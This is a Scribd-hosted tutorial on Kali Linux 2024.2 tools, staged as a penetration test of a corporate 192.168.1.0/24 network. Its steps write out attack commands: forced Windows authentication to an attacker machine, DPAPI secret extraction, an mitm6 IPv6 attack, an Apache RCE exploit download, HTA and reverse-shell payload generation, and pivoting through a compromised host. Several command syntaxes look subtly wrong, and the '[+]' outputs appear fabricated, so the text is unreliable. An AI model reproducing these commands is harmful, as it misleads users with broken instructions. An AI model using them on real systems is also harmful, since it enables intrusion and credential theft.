Scribd
Upload
41 views7 pages

How To Use New Kali Linux 2024 2 Released Hacking Tools 1721538913

The document outlines the usage of various hacking tools in the new Kali Linux 2024.2 release for conducting penetration tests on a corporate network. It provides step-by-step instructions for tools like autorecon, netexec, coercer, and others, detailing their commands and expected outputs. Each tool serves a specific purpose, from network reconnaissance to payload generation and intrusion detection.

Uploaded by

ranzer673
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
41 views7 pages

How To Use New Kali Linux 2024 2 Released Hacking Tools 1721538913

The document outlines the usage of various hacking tools in the new Kali Linux 2024.2 release for conducting penetration tests on a corporate network. It provides step-by-step instructions for tools like autorecon, netexec, coercer, and others, detailing their commands and expected outputs. Each tool serves a specific purpose, from network reconnaissance to payload generation and intrusion detection.

Uploaded by

ranzer673
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

HOW TO USE

NEW KALI LINUX


2024.2 RELEASED
HACKING TOOLS
NEW HACKING TOOLS
Scenario: Conducting a penetration test on a corporate network with the IP range
192.168.1.0/24.

1. autorecon: Multi-threaded network recon tool

Step 1: Initial Reconnaissance

We start by using autorecon to gather information about the target network.

autorecon -t 192.168.1.0/24

Output:

[+] Scanning 192.168.1.1 - 192.168.1.254


[+] Found host: 192.168.1.10 (Windows Server 2019)
[+] Found host: 192.168.1.20 (Linux Server)
[+] Found host: 192.168.1.30 (Web Server)
...

[+] Scan completed

2. netexec: Automate network security assessment

Step 2: Detailed Network Scanning

Next, we perform a more detailed network security assessment with netexec.

netexec --target 192.168.1.0/24 –scan

3. coercer: Coerce Windows server authentication

Step 3: Coerce Windows Authentication

We then use coercer to coerce a Windows server (192.168.1.10) to authenticate to our


machine (192.168.1.100).

coercer -t 192.168.1.10 -l 192.168.1.100

Output:

[+] Coercing 192.168.1.10 to authenticate to 192.168.1.100


[+] Successfully coerced authentication

4. dploot: Python version of SharpDPAPI


Step 4: Extract DPAPI Secrets

If we have access to the Windows machine, we use dploot to extract DPAPI secrets.

dploot --target 192.168.1.10 --username admin --password Passw0rd!

Output:

[+] Connecting to 192.168.1.10


[+] Extracting DPAPI secrets
[+] Found secret: password123

5. gowitness: Web screenshots with Chrome Headless

Step 5: Capture Web Screenshots

For web applications, we use gowitness to capture screenshots of web pages.

gowitness scan --source 192.168.1.0/24

Output:

[+] Scanning 192.168.1.10:80


[+] Scanning 192.168.1.20:80
[+] Scanning 192.168.1.30:80
...
[+] Scan completed

6. mitm6: Exploit IPv4 via IPv6

Step 6: Exploit IPv4 via IPv6

We use mitm6 to exploit the IPv4 network via IPv6 on the target domain corp.local.

mitm6 -d corp.local

Output:

[+] Starting MITM attack on corp.local


[+] Intercepting traffic
...

7. pspy: Monitor Linux processes without root

Step 7: Monitor Processes

We monitor Linux processes on 192.168.1.20 without root using pspy.


ssh [email protected]
./pspy64

Output:

[+] Monitoring processes


[+] Detected suspicious process: /bin/bash -c "wget http://malicious.com"
...

8. getsploit: Search and download exploits

Step 8: Search and Download Exploits

To search and download exploits for the web server (running Apache), we use getsploit.

getsploit search apache

Output:

[+] Found exploit: Apache HTTP Server 2.4.49 - Remote Code Execution (RCE)
[+] Downloading exploit
...

9. sharpshooter: Payload generation framework

Step 9: Generate Payloads

We generate payloads for testing using sharpshooter.

sharpshooter -p hta -o payload.hta

Output:

[+] Generating HTA payload


[+] Payload saved to payload.hta

10. snort: Network intrusion detection

Step 10: Intrusion Detection

To monitor network traffic for suspicious activities, we use snort.

snort -A console -i eth0 -c /etc/snort/snort.conf

Output:

[+] Starting Snort


[+] Alert: Potential RCE attack on 192.168.1.30
...

11. waybackpy: Access Wayback Machine API with Python

Step 11: Access Wayback Machine

Finally, we use waybackpy to access archived web pages.

from waybackpy import WaybackMachineCDXServerAPI

url = "http://example.com"
cdx_api = WaybackMachineCDXServerAPI(url)
print(cdx_api.snapshots())

Output:

[+] Retrieved snapshots:


[+] http://web.archive.org/web/20200101000000/http://example.com
[+] http://web.archive.org/web/20200201000000/http://example.com
...
Other Examples

12. horst: Optimized radio scanning

We'll use horst to scan for wireless devices and networks.

sudo horst -i wlan0

Output:

[+] Scanning wireless networks on wlan0


[+] Found network: SSID: CorpNet, BSSID: 00:11:22:33:44:55, Channel: 6
[+] Found network: SSID: GuestNet, BSSID: 66:77:88:99:AA:BB, Channel: 11
...

13. ligolo-ng: Advanced tunneling/pivoting tool

We use ligolo-ng for advanced tunneling and pivoting to route traffic through a
compromised machine.

On the attacker machine:

ligolo-ng client -L 127.0.0.1:1080

On the compromised machine:

ligolo-ng server

Output:

[+] Starting Ligolo-NG client on 127.0.0.1:1080


[+] Connected to Ligolo-NG server

14. sploitscan: Search for CVE info

We search for CVE information related to a specific service, e.g., Apache.

sploitscan search apache

Output:

[+] Searching for CVE information on 'apache'


[+] CVE-2021-41773: Apache HTTP Server Path Traversal and Remote Code Execution
[+] CVE-2021-42013: Apache HTTP Server Path Traversal and Remote Code Execution
...

15. vopono: Run apps through VPN tunnels


To run applications through VPN tunnels, we use vopono.

vopono --provider nordvpn --country US firefox

Output:

[+] Connecting to NordVPN in US


[+] VPN connection established
[+] Running firefox through VPN

16. sickle: Payload development tool

We develop a payload using sickle.

sickle -t reverse_shell -l 192.168.1.100 -p 4444 -o payload.bin

Output:

[+] Creating reverse shell payload


[+] Payload saved to payload.bin

17. pyinstaller: Package Python programs into executables

We package a Python script into an executable using pyinstaller.

pyinstaller --onefile myscript.py

Output:

[+] Packaging myscript.py into an executable


[+] Executable created: dist/myscript

18. pyinstxtractor: PyInstaller extractor

We extract contents from a PyInstaller executable using pyinstxtractor.

python pyinstxtractor.py myscript

Output:

[+] Extracting myscript


[+] Extraction completed
[+] Files extracted to: myscript_extracted/

You might also like